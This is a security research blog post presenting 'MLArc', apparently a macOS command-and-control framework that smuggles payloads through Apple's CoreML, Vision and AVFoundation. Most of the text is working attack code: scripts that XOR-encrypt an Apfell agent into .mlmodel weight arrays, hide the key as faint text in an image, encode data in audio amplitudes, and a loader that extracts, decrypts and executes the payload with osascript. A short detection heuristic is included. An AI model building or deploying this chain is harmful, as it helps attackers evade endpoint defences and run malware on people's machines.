Weaponizing Apple AI for Offensive Operations - Part I

This blog series introduces MLArc, a standalone command-and-control framework that operates entirely through Apple’s AI stack. Unlike conventional C2 systems that rely on JSON over HTTP, script interpreters, or DLL injection, MLArc uses AI artifacts as the transport layer. Commands are delivered inside .mlmodel files, decryption keys are hidden in plain sight inside images and recovered via Vision OCR, and results can be returned in model metadata or even covertly encoded into audio waveforms via AVFoundation.

In Part 1, we’ll build the foundation: an overview of Apple’s AI stack, a technical breakdown of CoreML and Vision, and a detailed walk-through of embedding an Apfell payload into model weight arrays. In Part 2, we’ll extend the attack surface by abusing AVFoundation as a covert channel and demonstrate how MLArc combines these techniques into a fully functional C2 workflow, one that masquerades entirely as normal AI activity.


Apple AI Stack Overview


Apple has spent the last decade building a vertically integrated AI ecosystem. Unlike frameworks such as TensorFlow or PyTorch, which often run on servers, Apple’s AI is designed to run on-device for privacy and speed. This means models, inference engines, and helper APIs all execute within the user’s trust boundary: macOS, iOS, and watchOS.

From a developer’s perspective, this stack looks like a convenient set of APIs. From an attacker’s perspective, it’s an unmonitored path into execution.

CoreML Engine

  • Purpose: CoreML is Apple’s runtime for executing machine learning models locally.
  • Format: Models are stored in .mlmodel files (protobuf-based). These are compiled into .mlmodelc by coremlc or Xcode.
  • Execution: Models are loaded via MLModel(contentsOf:) or VNCoreMLModel(), and run on Apple’s Neural Engine (ANE), GPU, or CPU.
  • Structure of a .mlmodel:
    • ModelDescription: defines input/output types and shapes.
    • ModelType: architecture backend (e.g., neural network, tree ensemble).
    • Layers: each with serialized parameters (e.g., convolution kernels, fully connected matrices).
    • Metadata: open userDefined dictionary for arbitrary developer notes.
  • Security assumption:
    • .mlmodel files are not signed.
    • Gatekeeper, notarization, and XProtect do not verify their contents.
    • Apple assumes that an app trusted to load a model also implicitly trusts the model file.

For attackers, this is the first gap: a binary blob that can carry arbitrary data, parsed only by Apple’s own runtime, with no AV/EDR inspection.
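
To see how transparent the format is, here’s a minimal sketch that opens an arbitrary .mlmodel with coremltools and dumps its structure (the model path is a placeholder); no signature or notarization check stands in the way:

import coremltools as ct

# Load the raw protobuf spec -- no signature check occurs at any point.
spec = ct.utils.load_spec("some_model.mlmodel")

# Arbitrary developer metadata travels with the model, unvalidated.
print(spec.description.metadata.userDefined)

# For neural network models, layer names and types are plainly readable.
for layer in spec.neuralNetwork.layers:
    print(layer.name, layer.WhichOneof("layer"))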

Vision Framework

  • Purpose: Provides high-level computer vision features: text recognition, barcode scanning, face detection, and object localization.
  • Integration: Vision wraps CoreML, meaning developers can plug models into Vision pipelines for OCR, image classification, etc.
  • API surface:
    • VNImageRequestHandler: accepts an image and executes Vision requests against it.
    • VNRecognizeTextRequest: OCR request that returns VNRecognizedTextObservation.
    • Other APIs: face tracking, object bounding boxes, barcode parsing.
  • Execution model: Vision consumes raw pixel buffers (CGImage, CIImage, CMSampleBuffer). It does not parse metadata like EXIF — it literally looks at pixel values.
  • Security assumption: Apple assumes OCR is “safe” because it only produces strings. Nothing checks whether those strings are secrets (keys, tokens, instructions).

For attackers, Vision becomes a covert key oracle: hide keys inside faint text and let Apple’s OCR deliver them invisibly.

AVFoundation

  • Purpose: Low-level multimedia framework powering nearly every audio/video feature on macOS/iOS.
  • Capabilities:
    • Audio/video playback (AVPlayer).
    • Audio capture and real-time processing (AVAudioEngine).
    • Access to PCM buffers (AVAudioPCMBuffer).
    • Encoding and export (AVAssetExportSession).
  • Integration: Works with higher-level APIs like Photos, Music, FaceTime, Podcasts.
  • Security assumption: Audio and video are treated as passive data streams. Apple does not expect adversaries to encode structured payloads inside waveform amplitudes.

For attackers, AVFoundation provides a steganographic covert channel. By encoding payloads as amplitude variations on a high-frequency carrier, we can deliver data that looks like an ordinary .wav file.
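
Part 2 walks through the AVFoundation implementation in detail, but the encoding concept is simple enough to sketch in plain Python here (illustrative only; the carrier frequency, burst length, and file name are arbitrary choices):

import wave
import numpy as np

def encode_bytes_as_amplitude(data, path, rate=44100):
    """Encode each payload byte as the peak amplitude of a 10 ms tone burst."""
    t = np.arange(rate // 100) / rate            # 10 ms of samples per byte
    bursts = []
    for b in data:
        amp = (b / 255.0) * 0.8                  # map byte 0-255 to amplitude 0-0.8
        bursts.append(amp * np.sin(2 * np.pi * 18000 * t))  # near-inaudible 18 kHz carrier
    pcm = (np.concatenate(bursts) * 32767).astype(np.int16)
    with wave.open(path, "wb") as wav:
        wav.setnchannels(1)
        wav.setsampwidth(2)
        wav.setframerate(rate)
        wav.writeframes(pcm.tobytes())

encode_bytes_as_amplitude(b"whoami", "carrier.wav")

The receiver measures the peak amplitude of each burst to recover the byte values; to any casual listener or file scanner, carrier.wav is just another audio file.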

Other AI-Adjacent Frameworks

  • RealityKit: body tracking and AR object detection.
  • SoundAnalysis: wraps AVFoundation to provide audio classification (speech, music, environmental sounds).
  • Siri & Spotlight: prediction APIs powered by CoreML models.

While these can also be abused, our research focused on the big three: CoreML, Vision, and AVFoundation. Together, they form a triangle of model (weights) + image (keys) + audio (commands) — all Apple-signed, all unmonitored.

Why Defenders Overlook This Stack

  1. AI artifacts are not treated as executables.
    • .mlmodel = “data file,” not code.
    • .png = “image,” not a secret store.
    • .wav = “sound,” not a command channel.
  2. Gatekeeper & notarization only cover binaries.
    • Apple never signs or validates .mlmodel.
    • Sandbox rules focus on app permissions, not model contents.
  3. EDRs don’t implement Apple’s private schemas.
    • No off-the-shelf scanner parses Model.proto.
    • No detection logic exists for OCR-based key extraction.
    • Audio payloads are indistinguishable from normal media.
  4. Every API we abuse is Apple-signed.
    • CoreML loads the model.
    • Vision extracts the key.
    • AVFoundation reconstructs payload strings.
    • osascript executes them.

This chain looks like “normal Apple activity” — which is exactly why it works.

That blind spot makes Apple’s AI stack an attractive staging ground for offensive operations. In our Black Hat briefing, we demonstrated how to embed Mythic’s Apfell agent inside .mlmodel weights, hide keys in images for extraction via Vision OCR, and even encode payloads into audio amplitudes using AVFoundation. Taken together, these techniques allow the creation of a stealthy C2 channel - MLArc - that hides in plain sight by abusing trusted AI workflows.

This blog post expands on that research in detail. We’ll break down how Apple’s AI stack works under the hood, show exactly how we stage and execute payloads inside it, and walk through the code that makes it possible.


CoreML as a Payload Container

Apple’s CoreML format (.mlmodel) is not a black box. It’s a binary serialization of a Protocol Buffer schema (Model.proto). Every .mlmodel you load is parsed by CoreML.framework, which expects specific message types:

  • Model → top-level object
  • ModelDescription → defines input/output shapes and datatypes
  • NeuralNetwork → container for layer graphs
  • NeuralNetworkLayer → each layer has a name, type, parameters
  • WeightParams → float arrays representing weights/biases

For example, a single innerProduct layer might look like this in proto (simplified):

message NeuralNetworkLayer {
  string name = 1;
  oneof layerType {
    InnerProductLayerParams innerProduct = 3;
    ConvolutionLayerParams convolution = 4;
    ...
  }
}

message InnerProductLayerParams {
  WeightParams weights = 1;
  WeightParams bias = 2;
}

message WeightParams {
  repeated float floatValue = 10;
}

The floatValue array is just a repeated field of float32. CoreML never checks that these floats correspond to meaningful weights; it simply assumes they came from a trained model. This is our injection vector.

Embedding a Payload

Let’s say we want to hide an Apfell JavaScript payload (apfell.js) inside a model. We do this in three steps:

  1. Encrypt the payload:
    XOR encryption ensures that even if someone dumps the weights, they won’t see raw JS.
def xor_encrypt(data, key):
    key_bytes = key.encode("utf-8")
    return bytes([b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data)])
  2. Recast into floats:
    After XOR, we treat each byte as a float32.
import numpy as np
encrypted = xor_encrypt(open("apfell.js","rb").read(), "my_secret_key")
float_array = np.frombuffer(encrypted, dtype=np.uint8).astype(np.float32)

Now we have an array like:

[102.0, 13.0, 200.0, 44.0, ...]
  3. Inject into .mlmodel:
    Using coremltools, we open an existing .mlmodel and replace a layer’s weights:
import coremltools as ct
spec = ct.utils.load_spec("base_model.mlmodel")
for layer in spec.neuralNetwork.layers:
    if layer.name == "payload_layer":
        layer.innerProduct.weights.floatValue[:] = float_array
ct.utils.save_spec(spec, "malicious_model_weights.mlmodel")

At this point, the model compiles and loads without complaint. Nothing in Apple’s runtime checks that floatValue represents a convolution kernel versus an encrypted shellcode blob.
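
Before shipping the model, a quick round-trip check confirms the bytes survive the float recast intact (a sketch reusing the xor_encrypt helper and key from above; XOR is symmetric, so the same routine decrypts):

import coremltools as ct

spec = ct.utils.load_spec("malicious_model_weights.mlmodel")
for layer in spec.neuralNetwork.layers:
    if layer.name == "payload_layer":
        # Each float holds one byte (0-255), which float32 represents exactly.
        recovered = bytes(int(v) for v in layer.innerProduct.weights.floatValue)
        plaintext = xor_encrypt(recovered, "my_secret_key")
        print(plaintext[:60])  # should print the opening bytes of apfell.js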

Why EDR Misses This

If an AV tool scans the file, all it sees is protobuf bytes like:

0a 0f 70 61 79 6c 6f 61 64 5f 6c 61 79 65 72 10 ...
12 8a 01 0d cd cc cc 3d 0d 00 00 48 42 ...

Unless the tool actually implements Apple’s Model.proto, parses the floats, and then notices that their distribution is anomalous for trained weights, it cannot know this is malicious. Every other part of the .mlmodel still describes a valid feedforward network.

Apple’s own assumption — “AI models are just data” — becomes the attacker’s advantage.
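
Flip that around and the missing detection logic is easy to prototype: a defender who does parse Model.proto can flag weight arrays whose statistics look like recast bytes rather than trained floats. A rough defender-side sketch (the heuristic is illustrative, not tuned):

import numpy as np
import coremltools as ct

def flag_suspicious_layers(model_path):
    """Flag weight arrays that look like byte-recast data, not trained floats."""
    spec = ct.utils.load_spec(model_path)
    for layer in spec.neuralNetwork.layers:
        w = np.array(layer.innerProduct.weights.floatValue)
        if w.size == 0:
            continue
        # Trained weights are small, signed, fractional values. An array of
        # whole numbers confined to 0-255 looks like recast bytes instead.
        if np.all(w == np.round(w)) and w.min() >= 0 and w.max() <= 255:
            print(f"[SUSPECT] {layer.name}: {w.size} byte-like values")

flag_suspicious_layers("malicious_model_weights.mlmodel")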

Embedding Apfell into a CoreML .mlmodel

The key idea is that a .mlmodel file is just a serialized protobuf with structured fields. Inside, neuralNetwork.layers contain weight arrays (float32 values). We can overwrite one of those arrays with an encrypted Apfell payload.

Here’s the end-to-end process:

Step 1: Encrypt the Apfell Payload

We take the apfell.js payload and XOR-encrypt it with a key.



def xor_encrypt(data, key):
    """
    Encrypts data using XOR with the given key.
    """
    key_bytes = key.encode("utf-8")
    return bytes([b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data)])

if __name__ == "__main__":
    payload_path = "/Users/hari/Desktop/CoreML/Apfell/apfell.js"  # Original payload
    xor_key = "my_secret_key"  # XOR key
    output_encrypted_path = "/Users/hari/Desktop/CoreML/Apfell/encoded_payload.txt"  # Save path for encoded payload

    # Read the payload in binary mode
    with open(payload_path, "rb") as file:
        payload = file.read()

    # Encrypt the payload
    encrypted_payload = xor_encrypt(payload, xor_key)

    # Save the encrypted payload as text
    with open(output_encrypted_path, "wb") as file:
        file.write(encrypted_payload)

    print(f"[INFO] Encrypted payload saved to {output_encrypted_path}")

Step 2: Embed the XOR Key into Image Pixels

from PIL import Image, ImageDraw, ImageFont

def embed_xor_key_in_image(key, image_path):
    """
    Embeds the XOR key as faint text in an image.
    """
    width, height = 300, 300
    image = Image.new("RGB", (width, height), "white")
    draw = ImageDraw.Draw(image)

    # Font settings
    try:
        font = ImageFont.truetype("/System/Library/Fonts/Supplemental/Courier New.ttf", size=14)
    except OSError:  # fall back if the bundled font is unavailable
        font = ImageFont.load_default()

    # Embed the key as faint text
    faint_color = (200, 200, 200)
    draw.text((10, 10), key, font=font, fill=faint_color)

    # Save the image
    image.save(image_path, "PNG")
    print(f"[INFO] XOR key embedded and saved to {image_path}")

if __name__ == "__main__":
    key = "my_secret_key"
    image_path = "/Users/hari/Desktop/CoreML/Apfell/xor_key_image.png"

    embed_xor_key_in_image(key, image_path)

Step 3: Inject Into .mlmodel

import coremltools
import numpy as np
from coremltools.models.neural_network import NeuralNetworkBuilder
from coremltools.models.datatypes import Array

def embed_payload_in_model(encoded_payload_path, model_path):
    """
    Embeds an XOR-encoded payload into a CoreML model's weights.
    """
    # Read the XOR-encoded payload as binary
    with open(encoded_payload_path, "rb") as file:
        encoded_payload = file.read()

    # Convert the payload to numerical format
    payload_array = np.array(list(encoded_payload), dtype=np.float32)

    # Define input and output features with dynamic size based on payload length
    input_size = len(payload_array)
    input_features = [("input", Array(input_size))]
    output_features = [("output", Array(1))]

    # Build the CoreML model
    builder = NeuralNetworkBuilder(input_features, output_features)

    # Add a layer to embed the payload in weights
    builder.add_inner_product(
        name="payload_layer",
        W=payload_array.reshape(-1, input_size),  # Reshape payload to match input size
        b=None,
        input_channels=input_size,
        output_channels=1,
        has_bias=False,
        input_name="input",
        output_name="output"
    )
    print("[INFO] Payload embedded in model weights.")

    # Save the model
    mlmodel = coremltools.models.MLModel(builder.spec)
    mlmodel.save(model_path)
    print(f"[INFO] Malicious CoreML model saved to {model_path}")

if __name__ == "__main__":
    encoded_payload_path = "/Users/hari/Desktop/CoreML/Apfell/encoded_payload.txt"
    model_path = "/Users/hari/Desktop/CoreML/Apfell/malicious_model_weights.mlmodel"

    embed_payload_in_model(encoded_payload_path, model_path)

The result is a fully valid .mlmodel file. It will compile with coremlc and load with MLModel(contentsOf:) without errors.
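
As a sanity check, loading the artifact back through coremltools exercises the same parsing path (a minimal check; on macOS this also compiles the model under the hood):

import coremltools as ct

# If this load succeeds, the payload-bearing model parses as a
# perfectly ordinary feedforward network.
mlmodel = ct.models.MLModel("malicious_model_weights.mlmodel")
print(mlmodel.get_spec().description)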

How It Looks on Disk

If we dump the injected model’s protobuf in text form, we’ll see something like:

layer {
  name: "payload_layer"
  innerProduct {
    weights {
      floatValue: 72.0
      floatValue: 101.0
      floatValue: 108.0
      ...
    }
  }
}

To CoreML, these are just float weights. To us, they’re an encrypted Apfell agent.

Step 4: Extraction and Execution

On the target, we reverse the process:

  1. Load .mlmodel with coremltools or MLModel.
  2. Locate payload_layer and grab its floatValue[].
  3. Convert floats back to integers.
  4. Decrypt with the OCR-extracted key.
  5. Execute the result with osascript.

import coremltools
import numpy as np
import os
import subprocess
import Vision
import Foundation
import tempfile

def extract_key_with_vision(image_path):
    """
    Extracts the XOR key from an image using Vision Framework.
    """
    try:
        image_url = Foundation.NSURL.fileURLWithPath_(image_path)
        request_handler = Vision.VNImageRequestHandler.alloc().initWithURL_options_(image_url, None)
        extracted_text = []

        def handle_text_request(request, error):
            if error:
                print(f"[ERROR] Vision Framework error: {error}")
                return
            for result in request.results():
                if isinstance(result, Vision.VNRecognizedTextObservation):
                    for candidate in result.topCandidates_(1):
                        extracted_text.append(candidate.string())

        text_request = Vision.VNRecognizeTextRequest.alloc().initWithCompletionHandler_(handle_text_request)
        success, error = request_handler.performRequests_error_([text_request], None)
        if not success:
            print(f"[ERROR] Failed to perform text recognition request: {error}")
            return None

        if not extracted_text:
            raise ValueError("No text recognized in the image.")
        return extracted_text[0]
    except Exception as e:
        print(f"[ERROR] Failed to extract XOR key: {e}")
        return None

def xor_decrypt(data, key):
    """
    Decrypts data using XOR with the given key.
    """
    key_bytes = key.encode("utf-8")
    return bytes([b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data)])

def execute_payload_using_fd(payload):
    """
    Executes the decrypted payload by writing it to a short-lived
    temporary file and handing that file to osascript.
    """
    temp_file_path = None
    try:
        # Write the payload to a short-lived temporary file on disk
        with tempfile.NamedTemporaryFile("w+", delete=False, suffix=".js") as temp_file:
            temp_file.write(payload.decode("utf-8"))
            temp_file.flush()
            temp_file_path = temp_file.name

        # Debugging: Uncomment this to verify the temporary file content
        # with open(temp_file_path, "r") as f:
        #     print(f"[DEBUG] Payload content in file:\n{f.read()}")

        # Execute the payload using the temporary file
        command = ["osascript", temp_file_path]
        result = subprocess.run(command, capture_output=True, text=True)

        if result.returncode == 0:
            print("[INFO] Payload executed successfully.")
        else:
            print(f"[ERROR] Payload execution failed: {result.stderr}")

    except Exception as e:
        print(f"[ERROR] Failed to execute payload: {e}")
    finally:
        # Ensure the temporary file is deleted
        if temp_file_path and os.path.exists(temp_file_path):
            os.remove(temp_file_path)

def extract_and_execute_payload(model_path, image_path):
    """
    Extracts the XOR-encoded payload from the CoreML model, retrieves the XOR key using Vision Framework,
    decrypts the payload, and executes it using a virtual file descriptor.
    """
    try:
        print("[INFO] Extracting XOR key from the image...")
        xor_key = extract_key_with_vision(image_path)
        if not xor_key:
            print("[ERROR] Failed to extract XOR key.")
            return
        print(f"[INFO] XOR key extracted: {xor_key}")

        spec = coremltools.utils.load_spec(model_path)
        for layer in spec.neuralNetwork.layers:
            if layer.name == "payload_layer":
                payload_encrypted = np.array(layer.innerProduct.weights.floatValue, dtype=np.float32)
                # Each float32 stores one original byte (0-255); cast back losslessly.
                payload_encrypted = bytes(int(b) for b in payload_encrypted)

                payload_decrypted = xor_decrypt(payload_encrypted, xor_key)
                if not payload_decrypted:
                    print("[ERROR] Failed to decrypt the payload.")
                    return
                print("[INFO] Payload decrypted successfully.")

                execute_payload_using_fd(payload_decrypted)
                return

        print("[ERROR] Payload layer not found in the model.")
    except Exception as e:
        print(f"[ERROR] Failed to extract, decrypt, or execute payload: {e}")

if __name__ == "__main__":
    model_path = "/Users/hari/Desktop/CoreML/Apfell/malicious_model_weights.mlmodel"
    image_path = "/Users/hari/Desktop/CoreML/Apfell/xor_key_image.png"

    extract_and_execute_payload(model_path, image_path)